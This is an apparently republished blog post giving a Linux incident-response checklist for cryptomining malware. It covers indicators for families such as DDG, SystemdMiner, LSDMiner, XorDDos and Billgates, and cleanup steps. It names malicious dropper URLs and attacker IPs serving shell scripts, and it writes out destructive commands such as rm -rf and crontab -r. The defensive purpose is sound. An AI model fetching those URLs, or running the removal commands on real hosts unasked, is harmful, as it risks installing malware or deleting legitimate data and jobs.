Linux Emergency Response Troubleshooting

Enterprise 2023-05-08 08:04:34 views: null

online search feature

Use Baidu/google to search for abnormal characteristics of the host:

[1] Suspicious process name

[2] Suspicious domain name/IP traffic

[3] Suspicious timed tasks

[4] Suspicious file path

Suspicious process name

Use the top command to view the name of the mining process with the highest CPU usage, as follows: sysupdate.

As follows, search for the keyword "sysupdate mining".

Suspicious domain/IP traffic

Search the domain name of the gateway alarm, as follows: w.3ei.xyz:43768/crontab.sh.

Use the netstat -antp command to look for suspicious network connections, as follows: 136.243.90.99.

Suspicious cron job

Use the crontab -l command to view the scheduled tasks of the host and search for suspicious items, as follows: 45.79.9.153:8000/i.sh.

Suspicious file path

Look for suspicious files/folders in the /tmp/ and /root/ directories, as follows: .firefoxcatche.

Epidemic virus family characteristics

Virus family with suspicious timed tasks

DDG

There is a timed task of i.sh string. 

SystemdMiner

There are base64-encoded malicious sh scripts in the /var/spool/cron/ and /etc/cron.d/ directories.

 

StartMiner

There is a scheduled task with the word start.jpg.

LSDMiner

In the initial version, the string of pastebin.com exists in the scheduled task.

Then, in the intermediate version, the string of lsd.systemten.org exists in the scheduled task.

In the latest version, the string of aliyun.one exists in the scheduled task.

XorDDos

The cron task contains strings of gcc.sh. 

Virus families with suspicious filenames

Billgates

There are gates.lod and moni.lod files in the /tmp directory.

DDG

There are ELF files of ddgs.+ numbers in the tmp directory. 

SystemdMiner

There are sh scripts with random names under the /root directory and the /opt directory. 

StartMiner

There are virus files named x86_* in the /tmp directory. 

clearing steps

Remove the virus in 3 steps:

[1] Locate the mining process & virus file

[2] Clear virus process & files

[3] Check scheduled tasks

Locate mining process & virus files

Use the top command to locate the mining process and find the process with the highest CPU usage.

Use the ls /proc[pid]/exe command to locate the file path.

Clean virus process & files

Use the command kill -9 [pid] to end the virus process, and use the command rm -rf [filepath/dir_path] to delete the corresponding file/folder.

Check cron tasks

Run the command crontab -l to check whether there are suspicious scheduled tasks on the host.

Use the command ls -l /etc/cron.d to view suspicious cron job files. 

Use the command crontab -r to clear the scheduled tasks (PS: it can be used after confirming that the host has no business scheduled tasks).

Or use the command grep -r "[keyword]" /var/spool/cron to delete the specified scheduled task. 

Use the command rm /etc/cron.d/[file] to delete the cron task file.

File & scheduled task deletion failed

When the file is deleted, it prompts that the operation is not allowed, because the file is added with the i or a attribute, and the file can be successfully deleted by removing these two attributes.

Insufficient permissions are prompted when deleting scheduled tasks;

Use lsattr to view file attributes, and delete them successfully after clearing attributes through chattr.

Files & scheduled tasks reappear after deletion

There are two situations where files & scheduled tasks are deleted and repeated. The virus has hijacked the system files, or there is a residual virus process that repeatedly creates virus files.

The ss, netstat, ps, and lsof commands are replaced with virus files, and the original files need to be deleted, and then the pure files should be put in.

There are download processes such as curl and wget, which repeatedly download virus files.

It is also possible that a malicious process is guarding, so kill the suspicious process first.

After the virus process is killed, it is pulled up again

Keywords to search for suspicious processes on the host: sh, wget, curl, xmr, mine, ssh.

Find the parent process and end the entire process tree, as follows, you need to kill all the processes in red font.

The host freezes but the mining process cannot be found

The host is abnormal but no suspicious process can be found. It is likely that the virus hijacked system commands to hide it. You need to use the busybox tool to check.

The CPU usage of the system is high, but no mining process is found.

Use the top command of busybox to successfully discover the mining process and parent process.

busybox download address:

wget http://www.busybox.net/downloads/binaries/1.31.0-defconfig-multiarch-musl/busybox-x86_64 

The host is infected with a virus after cleaning

Make sure that the virus on the host has been cleaned, but it is still infected again. In this case, the virus must have invaded again through the network. It is necessary to check the risks related to ssh and vulnerabilities.

Check whether ssh is a weak password, and whether there is a secret-free public key in ~/.ssh/authorized_keys

Redis Unauthorized Access Vulnerability

Guess you like

Origin blog.csdn.net/jd_cx/article/details/126509245
Recommended
TIOBE May list: Fortran “resurrected” into Top 10
GCC 14.1 released
Ranking
B. Little Girl and Game【1300 / 回文字符串 博弈论】
CIKERS Shane 20190613
"Javascript advanced programming" study notes - the constructor and prototype
beeline hiveserver2 start
springboot - Automatically backup mysql data every day
Data Storage Full Solution--Detailed Persistence Technology
Detailed Explanation of Spring Web MVC DispatcherServlet—Official Original
TCP / IP protocol layers structure and function
Command type literal pos: unknown; Fallback type literal pos: unknown] with root cause
Design of multifunctional curtain controller with indoor anti-theft alarm
Daily
More
2024-05-08(18)
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)

Code World

© 2018 codetd.com